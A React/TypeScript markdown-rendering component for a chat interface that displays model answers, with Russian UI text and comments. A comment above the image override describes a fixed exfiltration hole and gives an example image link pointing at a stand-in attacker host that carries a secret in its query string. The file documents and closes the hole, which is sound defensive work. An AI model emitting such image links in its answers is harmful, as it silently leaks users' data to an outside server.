import { memo, useState } from 'react'
import ReactMarkdown from 'react-markdown'
import remarkGfm from 'remark-gfm'
import rehypeHighlight from 'rehype-highlight'

function CopyButton({ text }: { text: string }) {
  const [copied, setCopied] = useState(false)
  return (
    <button
      type="button"
      onClick={() => {
        navigator.clipboard.writeText(text).then(() => {
          setCopied(true)
          setTimeout(() => setCopied(false), 1500)
        })
      }}
      /* Как и кнопка под ответом: на тач-экране наведения нет, поэтому там
         она видна всегда, а прячется только там, где есть чем её вызвать. */
      className="absolute right-2 top-2 rounded-lg border border-(--hairline) bg-(--surface)/85 px-2 py-1
                 text-xs text-(--ink-dim) backdrop-blur transition hover:text-(--ink)
                 md:opacity-0 md:group-hover:opacity-100 md:focus:opacity-100"
    >
      {copied ? 'скопировано' : 'копировать'}
    </button>
  )
}

/** Достаёт текст из детей узла — для кнопки «копировать». */
function textOf(node: React.ReactNode): string {
  if (node === null || node === undefined || typeof node === 'boolean') return ''
  if (typeof node === 'string' || typeof node === 'number') return String(node)
  if (Array.isArray(node)) return node.map(textOf).join('')
  if (typeof node === 'object' && 'props' in node) {
    return textOf((node as { props: { children?: React.ReactNode } }).props.children)
  }
  return ''
}

export const Markdown = memo(function Markdown({ children }: { children: string }) {
  return (
    <div className="text-[0.95rem] leading-7">
      <ReactMarkdown
        remarkPlugins={[remarkGfm]}
        rehypePlugins={[rehypeHighlight]}
        components={{
          p: ({ children }) => <p className="mb-3 last:mb-0">{children}</p>,
          ul: ({ children }) => (
            <ul className="mb-3 list-disc space-y-1 pl-6 last:mb-0">{children}</ul>
          ),
          ol: ({ children }) => (
            <ol className="mb-3 list-decimal space-y-1 pl-6 last:mb-0">{children}</ol>
          ),
          h1: ({ children }) => (
            <h1 className="mb-3 mt-4 text-xl font-semibold first:mt-0">{children}</h1>
          ),
          h2: ({ children }) => (
            <h2 className="mb-2 mt-4 text-lg font-semibold first:mt-0">{children}</h2>
          ),
          h3: ({ children }) => (
            <h3 className="mb-2 mt-3 font-semibold first:mt-0">{children}</h3>
          ),
          // Images are never fetched, only their caption is shown.
          //
          // react-markdown rendered `![](url)` as a real <img>, and the
          // browser fetches that itself, with no click. The answer text is
          // written by the model, so one link of the form
          // `![](https://attacker.tld/?d=secret)` was enough to exfiltrate:
          // the request went out silently and left nothing in our own logs.
          // `urlTransform` does not help here — it filters `javascript:`,
          // not an arbitrary https host.
          //
          // The model has no reason to show pictures, so the simplest fix is
          // not to render them at all. CSP (`img-src`) closes the same hole a
          // second time, in case a custom renderer ever lands here.
          img: ({ alt }) => (
            <span className="text-(--ink-faint)">
              {alt ? `[картинка: ${alt}]` : '[картинка]'}
            </span>
          ),
          a: ({ children, href }) => (
            <a
              href={href}
              target="_blank"
              rel="noreferrer noopener"
              /* Без синего: в палитре нет ни одного оттенка. Ссылка читается
                 подчёркиванием, а наведение — яркостью текста. */
              className="text-(--ink) underline decoration-(--ink-faint) underline-offset-2
                         transition hover:decoration-(--ink)"
            >
              {children}
            </a>
          ),
          blockquote: ({ children }) => (
            <blockquote className="mb-3 border-l-2 border-(--hairline) pl-3 text-(--ink-dim)">
              {children}
            </blockquote>
          ),
          // Широкие таблицы не должны растягивать страницу — скроллим их саму.
          table: ({ children }) => (
            <div className="mb-3 overflow-x-auto rounded-xl">
              <table className="w-full border-collapse text-sm">{children}</table>
            </div>
          ),
          th: ({ children }) => (
            <th className="border border-(--hairline) px-2 py-1 text-left font-semibold">
              {children}
            </th>
          ),
          td: ({ children }) => (
            <td className="border border-(--hairline) px-2 py-1">
              {children}
            </td>
          ),
          code: ({ className, children, ...props }) => {
            // react-markdown зовёт этот компонент и для инлайна, и для блока.
            // Блок всегда обёрнут в <pre> и имеет language-*.
            const isBlock = /language-/.test(className ?? '')
            if (!isBlock) {
              return (
                <code
                  className="rounded-md bg-(--raised) px-1.5 py-0.5 font-mono text-[0.85em]"
                  {...props}
                >
                  {children}
                </code>
              )
            }
            return (
              <code className={`${className ?? ''} font-mono`} {...props}>
                {children}
              </code>
            )
          },
          pre: ({ children }) => (
            <div className="group relative mb-3">
              <CopyButton text={textOf(children)} />
              <pre className="overflow-x-auto rounded-xl bg-(--raised) p-3 text-[0.85rem] leading-6">
                {children}
              </pre>
            </div>
          ),
        }}
      >
        {children}
      </ReactMarkdown>
    </div>
  )
})
